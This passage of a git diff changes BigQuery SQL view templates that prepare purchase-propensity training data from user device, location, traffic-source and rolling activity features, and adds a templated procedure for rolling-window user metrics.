checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - will_purchase -FROM( -SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - will_purchase, - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_15_7` -) -WHERE - user_row_order = 1; - - --- This is a view preparing rows for purchase propensity modelling looking back 30 days and looking ahead 15 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_15", - description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - * EXCEPT(feature_date, row_order_peruser_persplit) -FROM ( -SELECT DISTINCT - processed_timestamp, - user_pseudo_id, - data_split, - feature_date, - -- Now, I want to skip rows per user, per split every 15 days. - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date ASC) AS row_order_peruser_persplit, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase -FROM( -SELECT DISTINCT - processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase, - -- Number of rows per user, per day, per split. Only one row per user, per day, per slip. - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_15` -) -WHERE - row_order_peruser_perday_persplit = 1 -) -WHERE - --Skipping windows of 15 days, which is the future window size. - MOD(row_order_peruser_persplit-1, 15) = 0; - - -- This is a view preparing rows for purchase propensity modelling looking back 30 days and looking ahead 15 days. --- This specifically filter rows which are most recent for each user. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15_last_window` +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15` (processed_timestamp, data_split, user_pseudo_id, @@ -1665,14 +744,20 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_trainin will_purchase) OPTIONS( --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_15_last_window", + friendly_name="v_purchase_propensity_training_30_15", description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", labels=[("org_unit", "development")] ) AS +SELECT DISTINCT + * EXCEPT(feature_date, row_order_peruser_persplit) +FROM ( SELECT DISTINCT processed_timestamp, - data_split, user_pseudo_id, + data_split, + feature_date, + -- Now, I want to skip rows per user, per split every 15 days. + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date ASC) AS row_order_peruser_persplit, user_id, user_ltv_revenue, device_category, @@ -1752,6 +837,7 @@ FROM( SELECT DISTINCT processed_timestamp, data_split, + feature_date, user_pseudo_id, user_id, user_ltv_revenue, @@ -1828,15 +914,21 @@ SELECT DISTINCT checkouts_past_8_14_day, checkouts_past_15_30_day, will_purchase, - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date DESC) AS user_row_order - --ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order + -- Number of rows per user, per day, per split. Only one row per user, per day, per slip. + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_15` ) WHERE - user_row_order = 1; + row_order_peruser_perday_persplit = 1 +) +WHERE + --Skipping windows of 15 days, which is the future window size. + MOD(row_order_peruser_persplit-1, 15) = 0; + + -- This is a view preparing rows for purchase propensity modelling looking back 30 days and looking ahead 15 days. --- This is to be used in case recently no purchases are registered, and you don't have a way to train the classification model. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15_rare_sales` +-- This specifically filter rows which are most recent for each user. +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15_last_window` (processed_timestamp, data_split, user_pseudo_id, @@ -1917,115 +1009,12 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_trainin will_purchase) OPTIONS( --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_15_rare_sales", + friendly_name="v_purchase_propensity_training_30_15_last_window", description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", labels=[("org_unit", "development")] ) AS SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase - FROM - (SELECT DISTINCT - * - FROM `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15_last_window` - ) - UNION ALL - ( - SELECT DISTINCT - * EXCEPT(user_row_order, feature_date) - FROM( - SELECT DISTINCT - *, - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_15` - WHERE will_purchase = 1 - ) - WHERE - user_row_order = 1 - LIMIT 100 - ) -; - --- This is a view preparing rows for purchase propensity modelling looking back 30 days and looking ahead 15 days. --- This balances out the dataset, in case you need the purchase propensity model to split customer in two classes: future purchases and non-purchases. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15_balanced` -(processed_timestamp, + processed_timestamp, data_split, user_pseudo_id, user_id, @@ -2102,111 +1091,10 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_trainin checkouts_past_7_day, checkouts_past_8_14_day, checkouts_past_15_30_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_15_balanced", - description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS - SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase - FROM ( - SELECT - DISTINCT *, - ROW_NUMBER() OVER (PARTITION BY will_purchase ORDER BY RAND()) AS rn - FROM - `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15` ) - WHERE - rn <= ( - SELECT - COUNT(will_purchase) - FROM - `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15` - WHERE - will_purchase = 1) -; - - -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30` -(processed_timestamp, + will_purchase +FROM( +SELECT DISTINCT + processed_timestamp, data_split, user_pseudo_id, user_id, @@ -2283,23 +1171,20 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_trainin checkouts_past_7_day, checkouts_past_8_14_day, checkouts_past_15_30_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_30", - description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - * EXCEPT(feature_date, row_order_peruser_persplit) -FROM ( -SELECT DISTINCT - processed_timestamp, + will_purchase, + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date DESC) AS user_row_order + --ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order + FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_15` + TABLESAMPLE SYSTEM (1 PERCENT) +) +WHERE + user_row_order = 1; + + +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30` +(processed_timestamp, data_split, user_pseudo_id, - feature_date, - --Now, I want to skip rows per user, per split every 15 days. - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date ASC) AS row_order_peruser_persplit, user_id, user_ltv_revenue, device_category, @@ -2374,13 +1259,23 @@ SELECT DISTINCT checkouts_past_7_day, checkouts_past_8_14_day, checkouts_past_15_30_day, - will_purchase -FROM( + will_purchase) +OPTIONS( + --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), + friendly_name="v_purchase_propensity_training_30_30", + description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", + labels=[("org_unit", "development")] +) AS +SELECT DISTINCT + * EXCEPT(feature_date, row_order_peruser_persplit) +FROM ( SELECT DISTINCT processed_timestamp, data_split, - feature_date, user_pseudo_id, + feature_date, + --Now, I want to skip rows per user, per split every 15 days. + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date ASC) AS row_order_peruser_persplit, user_id, user_ltv_revenue, device_category, @@ -2455,22 +1350,12 @@ SELECT DISTINCT checkouts_past_7_day, checkouts_past_8_14_day, checkouts_past_15_30_day, - will_purchase, - -- Number of rows per user, per day, per split. Only one row per user, per day, per slip. - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_30` -) -WHERE - row_order_peruser_perday_persplit = 1 -) -WHERE - -- Skipping windows of 30 days, which is the future window size. - MOD(row_order_peruser_persplit-1, 30) = 0; - - -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30_balanced` -(processed_timestamp, + will_purchase +FROM( +SELECT DISTINCT + processed_timestamp, data_split, + feature_date, user_pseudo_id, user_id, user_ltv_revenue, @@ -2546,107 +1431,17 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_trainin checkouts_past_7_day, checkouts_past_8_14_day, checkouts_past_15_30_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_30_balanced", - description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS - SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase - FROM ( - SELECT - DISTINCT *, - ROW_NUMBER() OVER (PARTITION BY will_purchase ORDER BY RAND()) AS rn - FROM - `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30` ) - WHERE - rn <= ( - SELECT - COUNT(will_purchase) - FROM - `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30` - WHERE - will_purchase = 1) -; + will_purchase, + -- Number of rows per user, per day, per split. Only one row per user, per day, per slip. + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit + FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_30` +) +WHERE + row_order_peruser_perday_persplit = 1 +) +WHERE + -- Skipping windows of 30 days, which is the future window size. + MOD(row_order_peruser_persplit-1, 30) = 0; CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30_last_window` @@ -2896,193 +1691,7 @@ SELECT DISTINCT ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date DESC) AS user_row_order --ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_30` + TABLESAMPLE SYSTEM (1 PERCENT) ) WHERE user_row_order = 1; - - -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30_rare_sales` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_30_rare_sales", - description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase - FROM - (SELECT DISTINCT - * - FROM `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30_last_window` - ) - UNION ALL - ( - SELECT DISTINCT - * EXCEPT(user_row_order, feature_date) - FROM( - SELECT DISTINCT - *, - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_30` - WHERE will_purchase = 1 - ) - WHERE - user_row_order = 1 - LIMIT 100 - ) -; diff --git a/sql/procedure/user_rolling_window_lead_metrics.sqlx b/sql/procedure/user_rolling_window_lead_metrics.sqlx new file mode 100644 index 00000000..26e25155 --- /dev/null +++ b/sql/procedure/user_rolling_window_lead_metrics.sqlx @@ -0,0 +1,129 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- Setting procedure to lookback from the day before `input_date` until the day before `end_date` +-- Subtract one day from `input_date` +SET input_date = DATE_SUB(input_date, INTERVAL 1 DAY); +-- Subtract one day from `end_date` +SET end_date = DATE_SUB(end_date, INTERVAL 1 DAY); + +{% for feature in short_list_features %} +-- Past User metrics: 1-day {{feature.feature_name}} events per user, 2-5-day {{feature.feature_name}} events per user +-- Create a temporary table `rolling_{{feature.feature_name}}_past_days` to store the rolling {{feature.feature_name}} events count for each user +CREATE OR REPLACE TEMP TABLE rolling_{{feature.feature_name}}_past_days AS ( +SELECT + -- User's unique identifier + user_pseudo_id, + -- Calculate the number of {{feature.feature_name}} made in the past 1 day + MAX(COUNT(DISTINCT CASE WHEN DATE_DIFF(input_date, event_date, DAY) = 1 THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{feature.feature_name}}_past_1_day, + -- Calculate the number of {{feature.feature_name}} made in the past 2 days + MAX(COUNT(DISTINCT CASE WHEN DATE_DIFF(input_date, event_date, DAY) = 2 THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{feature.feature_name}}_past_2_day, + -- Calculate the 